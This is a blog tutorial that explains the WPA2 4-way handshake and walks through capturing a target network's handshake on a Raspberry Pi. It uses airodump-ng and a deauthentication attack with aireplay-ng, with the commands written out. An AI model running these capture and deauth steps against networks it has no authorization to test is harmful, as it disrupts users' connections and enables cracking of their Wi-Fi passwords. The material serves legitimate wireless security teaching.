In our last blog, we covered how to set up the Raspberry Pi Zero W and connect to it remotely using a mobile device. https://hackernoon.com/setting-up-pi-zero-for-pi-fi-hacking?embedable=true https://hackernoon.com/setting-up-pi-zero-for-pi-fi-hacking?embedable=true Disclaimer: Everything shown in this blog was performed within legal boundaries and with full authorization from the network owner. This content is strictly for educational purposes. The author does not condone or take responsibility for any misuse of the techniques demonstrated. Disclaimer: Everything shown in this blog was performed within legal boundaries and with full authorization from the network owner. This content is strictly for educational purposes. The author does not condone or take responsibility for any misuse of the techniques demonstrated. Disclaimer: Now that we have the power of Linux at our fingertips, let’s look into capturing WPA handshakes. But before diving in, we'll take a brief look at… The WPA Handshake (4-Way Handshake) WPA/WPA2 is among the most widely used Wi-Fi security protocols. A core mechanism for ensuring data confidentiality and integrity over wireless networks in WPA/WPA2 is the 4-way handshake (WPA Handshake), which authenticates the client and access point and establishes encryption keys that secure data transmission. 4-way handshake authenticates establishes secure As the name suggests, the 4-way handshake consists of four messages exchanged between the client (supplicant) and the access point (authenticator).  The handshake begins once the client is successfully authenticated and associated with the access point. four messages client (supplicant) access point (authenticator) authenticated associated The 4-way handshake utilizes EAPOL (Extensible Authentication Protocol Over LAN) key frames to exchange messages. EAPOL (Extensible Authentication Protocol Over LAN) Four dynamically generated keys in the 4-way handshake process encrypt communication between the client and the access point: PMK (Pairwise Master Key) A shared secret derived during authentication. In WPA2-Personal, the PMK is derived directly from the Pre-Shared Key (PSK) using the Password-Based Key Derivation Function 2 (PBKDF2).
In WPA2-Enterprise, the PMK is derived from the Master Session Key (MSK), which the client and access point negotiate during authentication. In WPA2-Personal, the PMK is derived directly from the Pre-Shared Key (PSK) using the Password-Based Key Derivation Function 2 (PBKDF2). WPA2-Personal Pre-Shared Key (PSK) Password-Based Key Derivation Function 2 (PBKDF2). In WPA2-Enterprise, the PMK is derived from the Master Session Key (MSK), which the client and access point negotiate during authentication. WPA2-Enterprise Master Session Key (MSK) PTK (Pairwise Transient Key) This key is unique for each client-Access point pair and is used to encrypt all unicast traffic between the client and the access point. unicast It is derived using a Pseudo-Random Function (PRF) with the following inputs: Pseudo-Random Function (PRF) PTK = PRF( PMK + Anonce + SNonce + MAC(Access Point) + MAC(Client) ) PTK = PRF( PMK + Anonce + SNonce + MAC(Access Point) + MAC(Client) ) GMK (Group Master Key) This key is generated locally on the access point and never transmitted wirelessly. GTK (Group Temporal Key) This key is derived from the GMK and is distributed to all clients connected to the same access point. GMK It encrypts multicast and broadcast traffic sent by the access point to clients. multicast broadcast How the 4-way handshake works First EAPOL Message (AP → Client) The access point sends the ANonce(Authenticator Nonce) to the client, which uses it to derive the PTK (Pairwise Transient Key). ANonce(Authenticator Nonce) PTK (Pairwise Transient Key) The client already has the PMK (Pairwise Master Key) and the MAC addresses of both itself and the access point; it then generates the SNonce (Supplicant Nonce). PMK (Pairwise Master Key) MAC addresses SNonce (Supplicant Nonce) Second EAPOL Message (Client → AP) The client sends the SNonce (Supplicant Nonce) and a MIC (Message Integrity Code) to the access Point, allowing the access Point to derive the same PTK (Pairwise Transient Key). The MIC (Message Integrity Code) verifies the integrity of the message and ensures the SNonce has not been tampered with. SNonce (Supplicant Nonce) MIC (Message Integrity Code) PTK (Pairwise Transient Key). MIC (Message Integrity Code) SNonce Third EAPOL Message (AP → Client) The access point sends the GTK (Group Temporal Key) to the client, encrypted using the PTK (Pairwise Transient Key). GTK (Group Temporal Key) PTK (Pairwise Transient Key). Fourth EAPOL Message (Client → AP) The client sends a final EAPOL message containing a MIC, acknowledging the successful installation of both the PTK (Pairwise Transient Key) and GTK (Group Temporal Key). MIC acknowledging PTK (Pairwise Transient Key) GTK (Group Temporal Key) An easy way to understand the 4-way handshake is to think of how humans build trust in a relationship. 4-way handshake Each handshake is like an exchange of important information that helps both people confirm who they are and establish trust. Likewise, the access point and client exchange key material to confirm they share the same secret (PMK) and can securely communicate. secret (PMK) Once trust is established, secure communication can begin, much like a private relationship between two individuals. However, there is a critical flaw: anyone can listen to your conversations. anyone can listen to your conversations. The Flaw Wireless communication is inherently exposed, making it possible for anyone within range to eavesdrop on wireless traffic. inherently exposed eavesdrop During the 4-way handshake, critical values (like nonces and MAC addresses) are transmitted unencrypted, making passive capture possible. However, the device never transmits the pre-shared key (passphrase) over the air. Instead, it serves to derive the PMK (Pairwise Master Key) using the PBKDF2 function. pre-shared key PMK (Pairwise Master Key PBKDF2 But because the handshake provides all necessary inputs except the password, an attacker can: Use a dictionary or brute-force attack to try many password guesses
derive the PMK using PBKDF2
generate the PTK using PRF
compute a MIC and compare it to the captured MIC. Use a dictionary or brute-force attack to try many password guesses derive the PMK using PBKDF2 generate the PTK using PRF compute a MIC and compare it to the captured MIC. If the computed MIC matches the captured MIC, the attacker has found the passphrase. Now that 4-way handshakes and the underlying vulnerability are clear, we can begin… Capturing WPA Handshake We'll be using aircrack-ng, a complete suite of tools for assessing Wi-Fi network security, to capture WPA handshakes. aircrack-ng Setting Up Ensure your wireless adapter supports monitor mode
Connect it to the micro-USB port (not the power port) using an OTG cable
Connect to Pi via SSH
Check the network interface Ensure your wireless adapter supports monitor mode Connect it to the micro-USB port (not the power port) using an OTG cable Connect to Pi via SSH Check the network interface ifconfig ifconfig You can also use ip a if ifconfig is unavailable. You can also use ip a if ifconfig is unavailable. ip a ifconfig You can see multiple wireless interfaces, such as wlan0 and wlan1. One usually belongs to the internal card and the other to your wireless adapter. You can see multiple wireless interfaces, such as wlan0 and wlan1 . One usually belongs to the internal card and the other to your wireless adapter. However if you only see one interface, make sure the adapter is correctly connected and run: lsusb lsusb This confirms if the adapter is connected properly. This confirms if the adapter is connected properly. Update system packages Update system packages sudo apt update sudo apt update Install aircrack-ng Install aircrack-ng aircrack-ng sudo apt install aircrack-ng sudo apt install aircrack-ng Kali and Parrot usually come with aircrack-ng preinstalled, but no harm in running this. Kali and Parrot usually come with aircrack-ng preinstalled, but no harm in running this. Configuring monitor mode Check the interfaces with airmon-ng Check the interfaces with airmon-ng airmon-ng sudo airmon-ng sudo airmon-ng The command displays each interface alongside its driver and chipset. The command displays each interface alongside its driver and chipset. Enable monitor mode with airmon-ng Enable monitor mode with airmon-ng airmon-ng sudo airmon-ng start <interface> sudo airmon-ng start <interface> You will likely see a message suggesting that you run the command
sudo airmon-ng check kill 

This command stops processes that can interfere with the monitor mode, like NetworkManager or wpa_supplicant. Since our SSH connection is active, this will likely terminate our session. You will likely see a message suggesting that you run the command sudo airmon-ng check kill sudo airmon-ng check kill This command stops processes that can interfere with the monitor mode, like NetworkManager or wpa_supplicant. Since our SSH connection is active, this will likely terminate our session. NetworkManager wpa_supplicant Capturing handshake Dump all traffic Dump all traffic Dump all traffic sudo airodump-ng <interface> sudo airodump-ng <interface> The command will dump a real-time list of detected access points and also a list of connected clients (stations). The command will dump a real-time list of detected access points and also a list of connected clients (stations). Before continuing, let us analyze the above output. The upper section shows the data for access points: BSSID: MAC address of the access point. BSSID PWR: Signal level reported by the Wi-Fi adapter or Network Interface. When you move closer to the AP or station, the signal strength increases. PWR RXQ: Receive Quality as measured by the percentage of packets successfully received over the last 10 seconds. RXQ Beacons: Number of announcements packets sent by the access point. Beacons #Data: Number of captured data packets. #Data #/s: Number of data packets per second measured over the last 10 seconds. CH: Channel number. #/s MB: Maximum speed supported by the access point. MB ENC: Encryption algorithm in use, OPN refers to no encryption. ENC CIPHER: The cypher detected. CIPHER AUTH: The authentication protocol used. AUTH ESSID: The name of the network (SSID) ESSID The lower section shows data for clients (stations): STATION: The MAC address of each associated station or stations searching for an AP to connect with. Clients not currently associated with an AP have a BSSID of "(not associated)". STATION associated RATE: Station's receive rate, followed by transmit rate. RATE LOST: The number of data packets lost over the last 10 seconds based on the sequence number. LOST Packets: The number of data packets sent by the client Notes: Additional information about the client, such as captured EAPOL or PMKID. Packets Probe: The ESSIDs probed by the client. These are the networks the client is trying to connect to if it is not currently connected. Probe Next, copy the BSSID and channel (CH) of your target access point, as you will need them in the next step.


Dump traffic from the target access point. Next, copy the BSSID and channel (CH) of your target access point, as you will need them in the next step. Next, copy the BSSID and channel (CH) of your target access point, as you will need them in the next step. BSSID CH Dump traffic from the target access point. Dump traffic from the target access point. For this, open a new terminal tab so you don't disrupt the ongoing airodump session. airodump Click on the three dots on the tab and select duplicate Run airodump-ng on the target airodump-ng sudo airodump-ng --bssid <bssid> -c <channel_number> -w <output> <interface> sudo airodump-ng --bssid <bssid> -c <channel_number> -w <output> <interface> --bssid MAC address of the target access point --bssid -c channel of the target access point -c -w specifies file to save the capture -w The command lists the access point and the clients (stations) connected to it. The command lists the access point and the clients (stations) connected to it. As you can see, there is only one client connected to the target As you can see, there is only one client connected to the target Triggering the 4-way handshake (optional) Triggering the 4-way handshake (optional) By default, the process of capturing the WPA handshake is passive; we silently monitor Wi-Fi traffic without transmitting anything, which is stealthy but may require waiting for a client to reconnect automatically and trigger the 4-way handshake. passive To speed things up, we can force a client to disconnect, triggering a reconnect and the 4-way handshake using the deauthentication attack. force disconnect For this, we will use the aireplay-ng to send deauth packets to the target aireplay-ng deauth Open a new terminal (keeping the other two running) run aireplay-ng aireplay-ng sudo aireplay-ng --deauth 10 -a <target_bssid> <interface> sudo aireplay-ng --deauth 10 -a <target_bssid> <interface> --deauth specifies the deauth attack Alternatively, you can use -0 which is a common alias for the deauth attack --deauth deauth -0 deauth 10 is the number of deauth packets sent 10 deauth -a MAC address of the target -a aireplay-ng sends deauthentication packets using reason code 7 (Class 3 frame received from non-associated station) by default . aireplay-ng sends deauthentication packets using reason code 7 (Class 3 frame received from non-associated station) by default . You can target a specific client using the -c flag, which increases the chance of triggering a handshake if multiple clients are present: -c sudo aireplay-ng -0 10 -a <target_ap_mac> -c <client_mac> <interface> sudo aireplay-ng -0 10 -a <target_ap_mac> -c <client_mac> <interface> Check for the WPA handshake Check for the WPA handshake Return to the previous tab (running airodump-ng on target access point) airodump-ng EAPOL in the Notes field of the client indicates that the client has completed the 4-way handshake. EAPOL in the Notes field of the client indicates that the client has completed the 4-way handshake. Return to the first tab (running airodump-ng globally) airodump-ng At the top right, we can see the WPA handshake, confirming successful capture of the WPA handshake. At the top right, we can see the WPA handshake, confirming successful capture of the WPA handshake. In a new terminal, verify that the captured pcap contains the WPA handshake using aircrack-ng. In a new terminal, verify that the captured pcap contains the WPA handshake using aircrack-ng. pcap aircrack-ng sudo aircrack-ng <captured_file.cap> sudo aircrack-ng <captured_file.cap> To confirm that the WPA handshake is usable, aircrack-ng will attempt to validate its structure. If it's invalid or incomplete, it will say "No valid WPA handshakes found." "No valid WPA handshakes found." In the next blog, we'll walk through cracking the WPA handshake using Hashcat cracking the WPA handshake using Hashcat

Walkthroughs, tutorials, guides, and tips. This story will teach you how to do something new or how to do something better.

Setting Up Pi Zero for Pi-Fi Hacking

Read My Stories

Too Long; Didn't Read

Boost your HackerNoon story @ $159.99! 🚀

How to Capture WPA Handshakes with Raspberry Pi and Aircrack-ng

About Author

Comments

TOPICS

THIS ARTICLE WAS FEATURED IN

Related Stories

Untitled Story

Setting Up Pi Zero for Pi-Fi Hacking

Setting Up Pi Zero for Pi-Fi Hacking

The Future of Tractable Deep Generative Models

Critique Ability of Large Language Models: Self-Critique Ability

Configuring the Alpha AWUS036ACH Wi-Fi Adapter on Kali Linux

Setting Up Pi Zero for Pi-Fi Hacking

Setting Up Pi Zero for Pi-Fi Hacking

The Future of Tractable Deep Generative Models

Critique Ability of Large Language Models: Self-Critique Ability

Configuring the Alpha AWUS036ACH Wi-Fi Adapter on Kali Linux

Light-Mode

Classic

Newspaper

Dark-Mode

Neon Noir

Minty

HN StartUps